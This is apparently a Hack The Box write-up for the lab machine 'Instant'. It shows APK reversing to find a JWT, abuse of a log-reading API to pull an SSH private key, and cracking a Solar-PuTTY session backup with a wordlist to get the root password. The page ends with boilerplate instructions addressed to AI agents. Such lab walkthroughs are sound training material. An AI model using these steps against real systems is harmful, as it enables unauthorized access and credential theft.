> For the complete documentation index, see [llms.txt](https://runasdexter.gitbook.io/contents/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://runasdexter.gitbook.io/contents/machines/season-6/instant.md).

# Instant

## Synopsis

**Instant** is a medium linux machine created by [t**ahaafarooq**](https://app.hackthebox.com/users/573430)**.** The **instant.htb** domain contains the ***apk*** file. The reversing of ***apk*** file reveals the **subdomains** and **JWT** token which is used to read the logs. Abusing the read logs functionality to read the ***id\_rsa*** of the **shirohige** user. The ***/opt*** directory contains the **Solar-PuTTY** password protected encrypted ***.dat*** file which contains the session and credentials. **Decryption** the file reveals the **root** password.&#x20;

| OS    | Difficulty | Points | Release Date | Retired Date |
| ----- | ---------- | ------ | ------------ | ------------ |
| Linux | Medium     | 30     | 12-10-2024   | 01-03-2025   |

***

## Enumeration

### Nmap

Starting the **`nmap`** scan and found the ssh and http services running.

```bash
nmap -p- -Pn -sC -sV --min-rate=1000 10.10.11.37 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-14 09:30 EST
Warning: 10.10.11.37 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.37
Host is up (0.44s latency).
Not shown: 63941 closed tcp ports (conn-refused), 1592 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 31:83:eb:9f:15:f8:40:a5:04:9c:cb:3f:f6:ec:49:76 (ECDSA)
|_  256 6f:66:03:47:0e:8a:e0:03:97:67:5b:41:cf:e2:c7:c7 (ED25519)
80/tcp open  http    Apache httpd 2.4.58
Service Info: Host: instant.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 216.45 seconds
```

Add **instant.htb** in ***/etc/hosts*** file.

### Web - instant.htb

**Instant** is a **crypto** wallet. The website shows instant wallet features and we can **download** the ***instant.apk***.

<figure><img src="/files/MCqEyLlqFnxrVdlClS6a" alt=""><figcaption></figcaption></figure>

### File - instant.apk

Downloaded the ***instant.apk*** and reversed it using the **`jadx-gui`**. It contains the **JWT** token and **mywalletv1.instant.htb** subdomain in **AdminActivities** class.

<figure><img src="/files/1SPYsjZpVaDCAUs1bdEc" alt=""><figcaption></figcaption></figure>

Text searching the **.htb** I got another subdomain **swagger-ui.instant.htb.**

<figure><img src="/files/Cf0lku4Folc79vKGQw0Z" alt=""><figcaption></figcaption></figure>

Add both the **mywalletv1** and **swagger** subdomain in ***/etc/hosts*** file.

{% hint style="info" %}
To text search go to Navigation > Text Search
{% endhint %}

### Web - swagger-ui.instant.htb

**Swagger** (software) is a suite of tools for **API** developers, the project is open-source and licensed under the Apache License 2.0.

<figure><img src="/files/ufckiUAWuOXJFhZGwI1L" alt=""><figcaption><p>swagger-ui subdomain</p></figcaption></figure>

Clicking the <mark style="background-color:blue;">**Authorize**</mark> button gives us form to input the Authorization **token**, adding the previously gained **JWT** gives us the authorization.&#x20;

<figure><img src="/files/B7QagFq2KVfkzw0mmlXn" alt=""><figcaption></figcaption></figure>

***

## Foothold

### Shell - shirohige \[ read logs ]

The **Logs** section cantains the **API** to read and view the logs. It also shows the path to the log which is present in ***/home/shirohige/logs***

<figure><img src="/files/S7bg7oJtxxd5Sb8mZa7i" alt=""><figcaption></figcaption></figure>

Clicking the <mark style="background-color:blue;">**Try it out**</mark> button and adding the default path to *id\_rsa* file gives us the ***id\_rsa***.

<figure><img src="/files/mPgZl4IwNeKNOmizs0WN" alt=""><figcaption></figcaption></figure>

Copy the **id\_rsa** into the file and clear up the extra spaces and words.

```bash
chmod 600 id_rsa
```

```bash
ssh -i id_rsa shirohige@10.10.11.37                                                                                                                                      
Welcome to Ubuntu 24.04.1 LTS (GNU/Linux 6.8.0-45-generic x86_64)                                                                                                            
                                                                                                                                                                             
 * Documentation:  https://help.ubuntu.com                                                                                                                                   
 * Management:     https://landscape.canonical.com                                                                                                                           
 * Support:        https://ubuntu.com/pro                                                                                                                                    

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Last login: Mon Feb 17 05:42:25 2025 from 10.10.16.25
shirohige@instant:~$
```

{% hint style="info" %}
The user.txt file contains the user flag :clap:
{% endhint %}

***

## Privilege Escalation

### Pillaging - shirohige

Checking **`sudo`** privilege requires command, the ***instant.db*** is found which has some of the **hashes** but it is uncrackable using **`hashcat`** and ***rockyou.txt*** wordlist. The ***/opt/backups*** directory contains the ***SolarPutty*** directory.

```bash
shirohige@instant:~$ cd /opt/backups
shirohige@instant:/opt/backups$ ls
Solar-PuTTY
```

Solar-PuTTY is a free SSH client developed by SolarWinds that allows you to connect to any server or device on your network

The Solar-PuTTY directory contains the sessions-backup.dat file. The .dat file in Solar-PuTTY is used to store sessions and credentials which is encrypted.

```bash
shirohige@instant:/opt/backups/Solar-PuTTY$ ls
sessions-backup.dat
```

### Shell - root \[ .dat file decrypt ]

The **VoidSec** has created the github [**repository**](https://github.com/VoidSec/SolarPuttyDecrypt) to decrypt the Solar-PuTTY ***.dat*** files using wordlists and saving it into the file.

The repository contains the ***.exe*** file which will execute in Windows machine properly but I am using Linux machine and **`wine32`** is giving some error. The **ItsWatchMakerr** has created the github [**repository**](https://github.com/ItsWatchMakerr/SolarPuttyCracker) which contains the **`python`** script to decrypt the Solar-PuTTY ***.dat*** files and I will be using this script.

{% stepper %}
{% step %}

#### Transfering sessions-backup.dat file to local machine

Open the **`python`** http server in remote machine and download it using the **`wget`** in local machine.

```bash
shirohige@instant:/opt/backups/Solar-PuTTY$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.16.9 - - [18/Feb/2025 05:18:08] "GET /sessions-backup.dat HTTP/1.1" 200 -
```

```
wget http://10.10.11.37:8000/sessions-backup.dat                               
--2025-02-18 00:35:14--  http://10.10.11.37:8000/sessions-backup.dat
Connecting to 10.10.11.37:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1100 (1.1K) [application/octet-stream]
Saving to: ‘sessions-backup.dat’

sessions-backup.dat                         100%[========================================================================================>]   1.07K  1.25KB/s    in 0.9s    

2025-02-18 00:35:16 (1.25 KB/s) - ‘sessions-backup.dat’ saved [1100/1100]
```

{% endstep %}

{% step %}

#### Git clone the above repository

```bash
git clone https://github.com/ItsWatchMakerr/SolarPuttyCracker.git
Cloning into 'SolarPuttyCracker'...
remote: Enumerating objects: 18, done.
remote: Counting objects: 100% (18/18), done.
remote: Compressing objects: 100% (12/12), done.
remote: Total 18 (delta 4), reused 10 (delta 3), pack-reused 0 (from 0)
Receiving objects: 100% (18/18), 6.97 KiB | 1.74 MiB/s, done.
Resolving deltas: 100% (4/4), done.
```

{% endstep %}

{% step %}

#### Create python virtual environment

To execute the script create the **`python`** virtual environment and activate it.

```bash
python3 -m venv .venv 
source .venv/bin/activate 
```

{% endstep %}

{% step %}

#### Install the required module and execute the script

Changing directory to ***SolarPuttyCracker*** and installing the required module.

```bash
cd SolarPuttyCracker 
pip3 install -r requirements.txt
```

Executing the script with required arguments.

```bash
python3 SolarPuttyCracker.py -w /usr/share/wordlists/rockyou.txt -o ../session_restore.txt ../sessions-backup.dat
   ____       __             ___         __   __          _____                 __            
  / __/___   / /___ _ ____  / _ \ __ __ / /_ / /_ __ __  / ___/____ ___ _ ____ / /__ ___  ____
 _\ \ / _ \ / // _ `// __/ / ___// // // __// __// // / / /__ / __// _ `// __//  '_// -_)/ __/
/___/ \___//_/ \_,_//_/   /_/    \_,_/ \__/ \__/ \_, /  \___//_/   \_,_/ \__//_/\_\ \__//_/   
                                                /___/                                         
Trying to decrypt using passwords from wordlist...
Decryption successful using password: estrella
[+] DONE Decrypted file is saved in: ../session_restore.txt
```

{% endstep %}
{% endstepper %}

The ***session\_restore.txt*** contains the root ssh password.

{% code title="session\_restore.txt" %}

```json
{
    "Sessions": [
        {
            "Id": "066894ee-635c-4578-86d0-d36d4838115b",
            "Ip": "10.10.11.37",
            "Port": 22,
            "ConnectionType": 1,
            "SessionName": "Instant",
            "Authentication": 0,
            "CredentialsID": "452ed919-530e-419b-b721-da76cbe8ed04",
            "AuthenticateScript": "00000000-0000-0000-0000-000000000000",
            "LastTimeOpen": "0001-01-01T00:00:00",
            "OpenCounter": 1,
            "SerialLine": null,
            "Speed": 0,
            "Color": "#FF176998",
            "TelnetConnectionWaitSeconds": 1,
            "LoggingEnabled": false,
            "RemoteDirectory": ""
        }
    ],
    "Credentials": [
        {
            "Id": "452ed919-530e-419b-b721-da76cbe8ed04",
            "CredentialsName": "instant-root",
            "Username": "root",
            "Password": "12**24nzC!r0c%q12",
            "PrivateKeyPath": "",
            "Passphrase": "",
            "PrivateKeyContent": null
        }
    ],
    "AuthScript": [],
    "Groups": [],
    "Tunnels": [],
    "LogsFolderDestination": "C:\\ProgramData\\SolarWinds\\Logs\\Solar-PuTTY\\SessionLogs"
}
```

{% endcode %}

We will be using **`su`** command to change the user to **root** through **shirohige** because the **SSH** doesn't work using the above credentials.

```bash
shirohige@instant:/opt/backups/Solar-PuTTY$ su root
Password: 
root@instant:/opt/backups/Solar-PuTTY# whoami
root
root@instant:/opt/backups/Solar-PuTTY# 
```

{% hint style="info" %}
The root.txt file contains the root flag :tada:
{% endhint %}

***

## Proof of Concept

The below video provides the **PoC** of Instant machine.

{% embed url="<https://odysee.com/instant:8a93f95d8b9cacfb42f2e0b29680222a59d04411>" %}


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://runasdexter.gitbook.io/contents/machines/season-6/instant.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
